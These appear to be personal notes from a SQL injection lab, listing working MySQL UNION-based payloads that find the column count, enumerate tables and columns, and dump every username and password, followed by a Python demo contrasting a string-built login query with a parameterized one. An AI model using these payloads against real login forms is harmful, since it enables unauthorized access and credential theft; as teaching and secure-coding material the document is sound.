Just some rough notes. (I accidentally deleted the earlier post, so I'm reposting it.)
1. Determine whether the injection point is string-type or numeric-type
Enter 1' and the error message tells us it is string-type (the single quote lands inside a quoted literal):
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1
2. Determine the number of columns
Use ORDER BY. Since we assume we know neither a username nor a password, add an OR condition so the WHERE clause is always true:
' or 1=1 order by 1#   then order by 2, then order by 3. The first number that errors is one past the column count; here it shows there are 2 columns, so we can use a UNION-based injection.
3. Start injecting
Current database name (column 1 is a filler so the column count matches):
1' union select 1,database() from users#
Tables in the current database (filter on table_schema, not table_name):
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
Columns of the users table (the column is called column_name in information_schema.columns):
1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#
Finally, dump all the usernames and passwords:
1' union select group_concat(username),group_concat(password) from users#
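To show why each of the three steps above works against string concatenation and stops working once the query is parameterized, here is an added example (not code from the original post) that replays the quote test, the ORDER BY probe and the UNION dump against two versions of the same login query. It uses an in-memory SQLite database with a constructed users table; SQLite ends a line comment with "-- " rather than MySQL's "#", and the table and row values are made up for the example.

```python
import sqlite3

# Constructed sample data for this example; not from the original post.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES
    ('admin', 'hash-of-admin-pw'),
    ('alice', 'hash-of-alice-pw');
"""

# SQLite line-comment token; the post's payloads use MySQL's "#".
COMMENT = "-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """The bug: user input is pasted straight into the SQL text."""
    sql = ("SELECT username, password FROM users "
           "WHERE username='%s' AND password='%s' LIMIT 0,1" % (username, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """The fix: placeholders keep the input as data, never as SQL."""
    sql = ("SELECT username, password FROM users "
           "WHERE username=? AND password=? LIMIT 0,1")
    return conn.execute(sql, (username, password)).fetchall()


def probe(login, conn, payload):
    """Send one payload as the username and report what a caller would observe."""
    try:
        rows = login(conn, payload, "")
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("rows", rows)


def walkthrough(login):
    """Replay the post's three steps against a login function and collect the outcomes."""
    conn = make_db()
    out = {}
    # Step 1: a lone quote. A syntax error is what reveals the string context.
    out["quote"] = probe(login, conn, "1'")[0]
    # Step 2: ORDER BY n. The first n that errors is one past the column count.
    out["order_by"] = {
        n: probe(login, conn, "' OR 1=1 ORDER BY %d%s" % (n, COMMENT))[0]
        for n in (1, 2, 3)
    }
    # Step 3: UNION SELECT with a matching column count dumps the table.
    kind, result = probe(
        login, conn,
        "1' UNION SELECT group_concat(username), group_concat(password) FROM users"
        + COMMENT)
    out["union"] = result if kind == "rows" else kind
    return out


if __name__ == "__main__":
    print("vulnerable:", walkthrough(login_vulnerable))
    print("safe:      ", walkthrough(login_safe))
```

Against login_vulnerable the quote raises a syntax error, ORDER BY 3 errors while 1 and 2 succeed, and the UNION returns one row holding every username and password. Against login_safe every payload is simply an unknown username: no error, no rows. The same comparison is the first check to run on any login or search handler that builds SQL with string formatting.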